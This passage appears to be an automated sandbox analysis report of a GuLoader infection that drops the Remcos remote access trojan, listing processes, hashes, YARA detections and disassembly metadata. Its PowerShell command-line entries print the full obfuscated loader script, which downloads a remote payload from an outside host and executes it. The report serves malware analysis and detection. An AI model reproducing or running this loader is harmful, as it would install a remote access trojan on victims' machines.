oTWr- PPrua ftT H U po$,eG LA mTiID.NNegMaSBi) U ') ;Germiniparous (Levelheadedness 'Fo$SnG LunoChBAsA QlI : oPSka,rs OTO.e.tl BfBoA R evMyeWaRP nS.eNes.t=U $ Ig Hl Uo.nbPeaWiLAl:Mep ArskoAfPEsh TytrL vAF cIntLoOFodLooyaNA TKoi.iaVe+Ev+ A%Su$AfFDiOS LPiIAroK ljgO ssF ERa1Fl9 T7Li.CacAmoc.uBln LTF, ') ;$Booklores=$Foliolose197[$Pastelfarvernes];}$Kontorassistentens153=302470;$Fejldisponeres=27572;Germiniparous (Levelheadedness 'De$ GSal TOSpB VaMalF :NoSMat DOLaKCoEAgs .I a S y=Mi GagR.EB T S-Dic noH nAuT wE ONTet . Un$ThgJeA SmShI HNS g LsFr ');Germiniparous (Levelheadedness '.e$Kmg .l to,ebDiaJalCa:N SSaeVrnMygS eH,n ,eDe B =ka Cl[ yS LyUdsNot.oe ,m .a CWeo PnRavUneKrrBltMa]Ex: U:ViFP r MoFom BKoaUvs ueAs6Ty4 ,SCatinrViiV.nR gFe(Al$ DsRet eo kAme asAriBla a)Be ');Germiniparous (Levelheadedness 'S $ BgRelGiO bDiaAnlAv:U.S TPA kPlK,eE SD.oe P Ma=Sl U[ SSnyUnsReTKoeSkmGl.MatPreN xb TPo. yEAunFeCGiOH,D siFln RGZa] .:O :UnAKaSRecpoiKoIEr.TaGPue .t bSintH rUnIQuN ogSt( $ SReEBrNDigO ePrnUnECe)H ');Germiniparous (Levelheadedness ' B$ aGStLUnO oBHeaMaLRe: AMChuFolReT Fi,ob.ei mrnot .HSu= T$NosRepOnk uK MeSvdDeeQu. AsS Um,bTusSaT TrTeINaNTrG (Re$.okS oH NA tE oGir HanoSDrsCai nS AT SE rNO tJaeFonP SUn1Ek5,a3 ,,Su$SuFAmE jWalS dL,IMasSapTroSmnMaeNoRPiE lSPo)Di ');Germiniparous $Multibirth;"
                                                                Imagebase:0x7ff7be880000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2208076716.000001A2DAD9F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:5
                                                                Start time:23:01:57
                                                                Start date:30/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:6
                                                                Start time:23:02:07
                                                                Start date:30/10/2024
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Garveris nontitle Fiberizes skippendes Tirl Sennet Longus #>;$Conformists='Jacobes241';<#Udstykkerne Microfossil Syrians Zostera Condoled floozies #>; function Levelheadedness($Antinomians){If ($host.DebuggerEnabled) {$Videoapparatets86++;}$kreturene=$Pedlars+$Antinomians.'Length'-$Videoapparatets86; for ( $Tekstilarbejderne=2;$Tekstilarbejderne -lt $kreturene;$Tekstilarbejderne+=3){$Blinddren=$Tekstilarbejderne;$Maalestoksfaktor+=$Antinomians[$Tekstilarbejderne];}$Maalestoksfaktor;}function Germiniparous($Brions){ & ($Artistiske) ($Brions);}$Plenches=Levelheadedness ' ,MAno.vz,nifal lMoaA,/pe ';$Ruched=Levelheadedness 'FrTHalG s 1 S2 ';$underkuede='B [maNS.eIlTIb. ESCae SR SvHnIovCNoEU,P mO QIStNAaTA,MSuaTen bADeG BE r p]In:Ef:P.sHeEFiCFru dR fiDetD y lP rS OUnT ,ODdcEdOBeL O=,n$ R.eU CpuHTseStdTi ';$Plenches+=Levelheadedness 'T 5 R. a0Fo Li(DiW ,i CnArd.loC,wTesDe ReN ,TAn Ro1Tr0 .A.0G,;N ,WPui SnD 6do4M ;Fu ,xP.6Sa4 L; . HrPovSp:su1 3M.1Sl.Su0Te) O FoGUdeGrcfokCioBr/Bu2co0 F1 V0 0 F1So0S 1 G InFNoiMar leTufDioOmx M/ U1 r3Ne1in.Ma0Ko ';$Olga=Levelheadedness 'A U oSVaeParS,- aaTagRuEOlN CtO, ';$Booklores=Levelheadedness 'S.hEftOvt CpHjsNu:Br/Fu/ArtCaoFor.or teJesM vKdmAnaMicWhk Se UnEnn,fa A.Elc olHo/ rbSkiP.nAl/frIYen itLaeEvrM,pSil De VaSp.SlsCynB.pU ';$Afstalinisering=Levelheadedness ',n>K ';$Artistiske=Levelheadedness 'pri eKox s ';$Tekstilarbejdernenjustices='Hvorind';$Dadlers='\Trkfugl.Chr';Germiniparous (Levelheadedness ' y$Mog BlFoO.ub CAO l,b:SeN sOOpnVarUaE AL a ATT IStoS nDyA UlLd= a$E.e nU.V :AaaFipTuPFadUna GTE,ASh+Un$Udd Ra,ed LInEDiRElsTu ');Germiniparous (Levelheadedness 'Fo$PrgD.LUnO cBEbaDilAl:VefSaoCaL ImooBiLfooBeSAnEE 1Sa9 7Re=Am$ PBGuo noBiKsel aOB rPle sDe. Ps UP ,L tICot R(Li$CoaWofErSA,TKvaAllW IP N ZIEpsIsEEnROviMinPrGin) K ');Germiniparous (Levelheadedness $underkuede);$Booklores=$Foliolose197[0];$Moniliaceous231=(Levelheadedness 'My$HuGPilUdoHjBCoaJuLL.:SyS dKAkySkTTal ceAuR Nn,de FSco=HunPuEBoWb.- o ,B XJFrEUrc .tNu viSstyAnSE t uEavmSt..knfiETutMe.HewP EGeB .Cfal I E GnPlt M ');Germiniparous ($Moniliaceous231);Germiniparous (Levelheadedness 'M.$G,STikH,yF tUdls,eRurApnVieAcs D.D,H e aa CdDaeSurbasFe[ B$ ,OthlR g OaGe] H=Ho$ NPA,l e n.lcEeh pe TsLa ');$Absolutive138=Levelheadedness 'B,$F.S Mk yy Ptcel lerir Bn.aeAusBa.A.DC.o.vw DnsjltioUnas dG.F.ei.il eS (ma$OvBA oVio.lkLnl obarSkeFasC,,Sa$LoGRea BmBeiTrnlsgB,sDi) l ';$Gamings=$nonrelational;Germiniparous (Levelheadedness ',l$t,GSplG o .bH A BL :DrNCroKar m,ra al jtAnIviLC sDiTK,AUpNSpd TeFoNTrS.a= n(AvtHeEInSunT S-Mup UaNaTPeh H Di$T,GU,aFaM PIarnKoGLgsTi)K ');while (!$Normaltilstandens) {Germiniparous (Levelheadedness ' e$C,gBild,o ,b,haBelWr: iKBlaBlmG m,re SrOtaP tIns.p=T $S tAzr BuKreI ') ;Germiniparous $Absolutive138;Germiniparous (Levelheadedness 'blSB TTaAOsRSet -LoSFoLlaE,mEHepB Ge4Om ');Germiniparous (Levelheadedness 'Fr$ .g MlS O uB,aA l : NTaoslr m uaVoL ,tReiBrLmas STSua Rn od EAlnovsS =G ( .tOvEG.S oTWr- PPrua ftT H U po$,eG LA mTiID.NNegMaSBi) U ') ;Germiniparous (Levelheadedness 'Fo$SnG LunoChBAsA QlI : oPSka,rs OTO.e.tl BfBoA R evMyeWaRP nS.eNes.t=U $ Ig Hl Uo.nbPeaWiLAl:Mep ArskoAfPEsh TytrL vAF cIntLoOFodLooyaNA TKoi.iaVe+Ev+ A%Su$AfFDiOS LPiIAroK ljgO ssF ERa1Fl9 T7Li.CacAmoc.uBln LTF, ') ;$Booklores=$Foliolose197[$Pastelfarvernes];}$Kontorassistentens153=302470;$Fejldisponeres=27572;Germiniparous (Levelheadedness 'De$ GSal TOSpB VaMalF :NoSMat DOLaKCoEAgs .I a S y=Mi GagR.EB T S-Dic noH nAuT wE ONTet . Un$ThgJeA SmShI HNS g LsFr ');Germiniparous (Levelheadedness '.e$Kmg .l to,ebDiaJalCa:N SSaeVrnMygS eH,n ,eDe B =ka Cl[ yS LyUdsNot.oe ,m .a CWeo PnRavUneKrrBltMa]Ex: U:ViFP r MoFom BKoaUvs ueAs6Ty4 ,SCatinrViiV.nR gFe(Al$ DsRet eo kAme asAriBla a)Be ');Germiniparous (Levelheadedness 'S $ BgRelGiO bDiaAnlAv:U.S TPA kPlK,eE SD.oe P Ma=Sl U[ SSnyUnsReTKoeSkmGl.MatPreN xb TPo. yEAunFeCGiOH,D siFln RGZa] .:O :UnAKaSRecpoiKoIEr.TaGPue .t bSintH rUnIQuN ogSt( $ SReEBrNDigO ePrnUnECe)H ');Germiniparous (Levelheadedness ' B$ aGStLUnO oBHeaMaLRe: AMChuFolReT Fi,ob.ei mrnot .HSu= T$NosRepOnk uK MeSvdDeeQu. AsS Um,bTusSaT TrTeINaNTrG (Re$.okS oH NA tE oGir HanoSDrsCai nS AT SE rNO tJaeFonP SUn1Ek5,a3 ,,Su$SuFAmE jWalS dL,IMasSapTroSmnMaeNoRPiE lSPo)Di ');Germiniparous $Multibirth;"
                                                                Imagebase:0x6c0000
                                                                File size:433'152 bytes
                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2420231333.0000000008AA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2420398899.000000000BB20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2405265854.0000000005D5C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:7
                                                                Start time:23:02:07
                                                                Start date:30/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:9
                                                                Start time:23:02:30
                                                                Start date:30/10/2024
                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                Imagebase:0xd10000
                                                                File size:59'904 bytes
                                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.3333353972.000000002316F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.3317708385.0000000000789000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:false

                                                                Disassembly

                                                                Reset < >

                                                                  Executed Functions

                                                                  Function 00007FF848E8A726 Relevance: .5, Instructions: 477COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2216529433.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848e80000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1c21e78c80602b09267e83d560a9ffd12fb1d757bef37bda03d9ba3418c3ba8e
                                                                  • Instruction ID: 47e66991a5e0160f90860668323a68ff6bbd120937c91c62d40b26247d07aba9
                                                                  • Opcode Fuzzy Hash: 1c21e78c80602b09267e83d560a9ffd12fb1d757bef37bda03d9ba3418c3ba8e
                                                                  • Instruction Fuzzy Hash: 0DF1B53090CA8D8FEBA8EF28D8557F937D1FF54350F44426AE84DC7295DB3899858B82
                                                                  Function 00007FF848E8B8E2 Relevance: .5, Instructions: 462COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2216529433.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848e80000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 59468d66ead1307d74c21e448f42d55ddd7520798d51554be9a62283b36b324b
                                                                  • Instruction ID: 315f1175dc7351fcbb28562814889a19dbdd5b8ab8bd0dc2c64f507e83f32e0f
                                                                  • Opcode Fuzzy Hash: 59468d66ead1307d74c21e448f42d55ddd7520798d51554be9a62283b36b324b
                                                                  • Instruction Fuzzy Hash: 48E1933090CA8E8FEBA8EF28C8557E977D1FF94350F44426AD84DC7295DF7898458B81
                                                                  Function 00007FF848F54359 Relevance: 1.9, Strings: 1, Instructions: 682COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2218129933.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848f50000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: G
                                                                  • API String ID: 0-985283518
                                                                  • Opcode ID: 878d83710379ca5543fad44ef6d5140b071dc329874d36b9ebcc54967802c031
                                                                  • Instruction ID: 50b3932be5b3ec05cb48da2b94941f596a41dfeb936928b4353a70fffd4846ab
                                                                  • Opcode Fuzzy Hash: 878d83710379ca5543fad44ef6d5140b071dc329874d36b9ebcc54967802c031
                                                                  • Instruction Fuzzy Hash: A4123671E0EAD64FE39AA73C5865274BBE1EF62690F0901FAD449C70E3DE189C068356
                                                                  Function 00007FF848E8CFDF Relevance: .7, Instructions: 669COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2216529433.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848e80000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dc324b55ca82f8ce15b150f25f8bb8f9250c7b20fe20e94bd78ab12d40f66df7
                                                                  • Instruction ID: 552c89d643edbc38d76b1ef6af7fa46908a9c5c53329b3c023cd2436b2e45c7d
                                                                  • Opcode Fuzzy Hash: dc324b55ca82f8ce15b150f25f8bb8f9250c7b20fe20e94bd78ab12d40f66df7
                                                                  • Instruction Fuzzy Hash: 18226D30A1CA4D8FDF98EF58C495AADB7E2FFA8340F544169D40AD7295CB35E881CB81
                                                                  Function 00007FF848F59B54 Relevance: .5, Instructions: 469COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2218129933.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848f50000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: db7bcbb85ea2d846a84eb9a843e701bbf1289e110516feccbf1ec9c09abbbfa0
                                                                  • Instruction ID: 696680ebcc2795571386750605752ffd96c58567c1d9217759c07693f5c1b5f0
                                                                  • Opcode Fuzzy Hash: db7bcbb85ea2d846a84eb9a843e701bbf1289e110516feccbf1ec9c09abbbfa0
                                                                  • Instruction Fuzzy Hash: 84D13631E0DB8A4FE79AEB2868546B4BBE1EF56250F0801FBC04DCB5D3DA199C46C395
                                                                  Function 00007FF848E8B4F6 Relevance: .3, Instructions: 335COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2216529433.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848e80000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: aac2de51dfbf0c2e755f00d48addaf9fcc84a1b1885c53214c25864535310fdc
                                                                  • Instruction ID: 6117f6cd9dbcb2a5e4dda69f7526ac1c875f49514cfd7eeee972af941f588cc2
                                                                  • Opcode Fuzzy Hash: aac2de51dfbf0c2e755f00d48addaf9fcc84a1b1885c53214c25864535310fdc
                                                                  • Instruction Fuzzy Hash: DFB1B33090CA8D8FEB68EF28C8557E93BD1FF55350F44426EE84DC7292CB74A9458B86
                                                                  Function 00007FF848F55340 Relevance: .3, Instructions: 329COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2218129933.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848f50000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 74aa3e673249fbdb544faf33f7925bb49186918e9c8591700c2674139f2fb504
                                                                  • Instruction ID: 7d500693fd8ecec1747785570abcf4e55f21e7992d3848564a179231246841a1
                                                                  • Opcode Fuzzy Hash: 74aa3e673249fbdb544faf33f7925bb49186918e9c8591700c2674139f2fb504
                                                                  • Instruction Fuzzy Hash: 41A12431E1DE9A4FEB99AB2C98556B4BBE1FF593A4F0801BAD00DC71D3DE18AC058345
                                                                  Function 00007FF848F5A56A Relevance: .2, Instructions: 235COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2218129933.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848f50000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 035d168615b76b692bf59d3d4825a407563d20a3bc3f9b1008ddc3aa9de37848
                                                                  • Instruction ID: 7b1c11c16d7135ac7d1c66c8c431fe704aa0ca160944d10ad691eeab196d062b
                                                                  • Opcode Fuzzy Hash: 035d168615b76b692bf59d3d4825a407563d20a3bc3f9b1008ddc3aa9de37848
                                                                  • Instruction Fuzzy Hash: CD61F731E0EB894FE756AB6858546A4BBF1EF56350F0901FBD048CB0D3DA185895C396
                                                                  Function 00007FF848F59656 Relevance: .2, Instructions: 177COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2218129933.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848f50000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a79ba3bf5a84e80c01d6b8b75f85e5686a8f9a45c621f1d2e78da6f5e421e647
                                                                  • Instruction ID: 53b506e3e2050a37e2481ef4409d49980424aadc2b02b67296842950b96e664c
                                                                  • Opcode Fuzzy Hash: a79ba3bf5a84e80c01d6b8b75f85e5686a8f9a45c621f1d2e78da6f5e421e647
                                                                  • Instruction Fuzzy Hash: DA51D331E0DA854FE79AAB2868552A8BBE1FF55750F1801FEC04C871D3DE28AC498746
                                                                  Function 00007FF848F5A2C6 Relevance: .2, Instructions: 173COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2218129933.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848f50000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 785935361850a3b2b4c168b509c71367876a1a6038e5e498d96f7ef28d21ef88
                                                                  • Instruction ID: d2e1874148bdecab1d29ce59c5879d1c01b643eed2798f5151455a573e38acbf
                                                                  • Opcode Fuzzy Hash: 785935361850a3b2b4c168b509c71367876a1a6038e5e498d96f7ef28d21ef88
                                                                  • Instruction Fuzzy Hash: 77510232E0EA854FE759AB2898552B8BBE1FF55354F1800FEC04C871D3DF29AC898346
                                                                  Function 00007FF848F5AAD6 Relevance: .2, Instructions: 173COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2218129933.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848f50000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fcf80e1ea114188b505923199ac96d3f89424b132d3e2e0deb3b7e7fba1e4682
                                                                  • Instruction ID: caebc46eb1ed7c90695c39198e15c7dc6abad831de7fb6168b6c834dc8afa521
                                                                  • Opcode Fuzzy Hash: fcf80e1ea114188b505923199ac96d3f89424b132d3e2e0deb3b7e7fba1e4682
                                                                  • Instruction Fuzzy Hash: 3751D431E0EA855FE759AB2858552A8FBE2FF55750F1801FEC04CC71C3DE28AC998786
                                                                  Function 00007FF848F55422 Relevance: .1, Instructions: 108COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2218129933.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848f50000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 50ca5ac3d78c7f6ba27e6ded85e08e7483b9833ab6a2bb50e608a371ec1fd31d
                                                                  • Instruction ID: 921c831df7773e2cb1379f7593af8bc062cd2c6fb95ef0efe5702d47420ef85b
                                                                  • Opcode Fuzzy Hash: 50ca5ac3d78c7f6ba27e6ded85e08e7483b9833ab6a2bb50e608a371ec1fd31d
                                                                  • Instruction Fuzzy Hash: 04313131D1EE975FF3A9A7286821178EAE1FF097E4F5801BAD01DD31D3EE087814425A
                                                                  Function 00007FF848F544E4 Relevance: .1, Instructions: 97COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2218129933.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848f50000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e18e33417923188c47593965eec0163ab28a90a0eabb2b94be7d11cd10964d47
                                                                  • Instruction ID: 36e107be095f75e5cf2f1f030e1182a9d1bf831cd11af23967b0ca4a965c4371
                                                                  • Opcode Fuzzy Hash: e18e33417923188c47593965eec0163ab28a90a0eabb2b94be7d11cd10964d47
                                                                  • Instruction Fuzzy Hash: D6213571E1EEAA4FF3AAB72C1445174A6D2FFA13A0F5800BAD00DC71D7DE18AC054209
                                                                  Function 00007FF848E8ABE4 Relevance: .1, Instructions: 92COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2216529433.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848e80000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8ed26f0bcf38b8b7632d8c3059faaa66affeaef89ae960392350c48cc8d4ddee
                                                                  • Instruction ID: a825374373f82b35d70e52953b278f4d0d464d82fa449778edc79c3a4c64368d
                                                                  • Opcode Fuzzy Hash: 8ed26f0bcf38b8b7632d8c3059faaa66affeaef89ae960392350c48cc8d4ddee
                                                                  • Instruction Fuzzy Hash: CE31063081D64EAFFBB8AF58CC1ABF93291FF41359F800139D40D86092DB796985DB16
                                                                  Function 00007FF848F5150F Relevance: .1, Instructions: 80COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2218129933.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848f50000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 373f5539fb57263451b1bba0b379ffb70afe54f11f0256d347315f34982d53fc
                                                                  • Instruction ID: 3b644a14d6b6923d407ae863483be925f492f4dc74f564695c5ca2653890b147
                                                                  • Opcode Fuzzy Hash: 373f5539fb57263451b1bba0b379ffb70afe54f11f0256d347315f34982d53fc
                                                                  • Instruction Fuzzy Hash: 9D212B21E0EAC65FF395A73C2815074AAD0EF566D4F0901FAD04AC70D3DE2C5C89432A
                                                                  Function 00007FF848F592FB Relevance: .1, Instructions: 58COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2218129933.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848f50000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 75c1ca0f8eebeb011e91981603fca41443689a98ca3e9c00cbffefaa681d25fc
                                                                  • Instruction ID: 876dab2109be506ba1effb6cde64b1018ef4a9c0849258f7427311e59ed5e28e
                                                                  • Opcode Fuzzy Hash: 75c1ca0f8eebeb011e91981603fca41443689a98ca3e9c00cbffefaa681d25fc
                                                                  • Instruction Fuzzy Hash: 99012631E0EA869FEB9AE73C6851974B7E1EF16740B0805FAC00DCB1D7D908AC448395
                                                                  Function 00007FF848E83535 Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2216529433.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848e80000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                  • Instruction ID: 5f6525b4c40e49a8b224777401edeb9743f650b26be48d5259be4b959626fbe0
                                                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                  • Instruction Fuzzy Hash: EF01677111CB0C4FDB48EF0CE451AAAB7E0FB95364F50056DE58AC3651DB36E881CB45
                                                                  Function 00007FF848F575FA Relevance: .0, Instructions: 37COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2218129933.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848f50000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ec56a705165b94bb960bfac0d3828cecbc974841498766da96083052ce1ca85a
                                                                  • Instruction ID: e982056beb33a52dc605d568e7a9ee62d938fb10e3382ab7c50eaf06b1151587
                                                                  • Opcode Fuzzy Hash: ec56a705165b94bb960bfac0d3828cecbc974841498766da96083052ce1ca85a
                                                                  • Instruction Fuzzy Hash: 45F0ED32A0CD0C0EE389A22C680A1F9B3D2EFC8136F590277C10EC3186EE21D80B8248
                                                                  Function 00007FF848F579B9 Relevance: .0, Instructions: 30COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2218129933.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
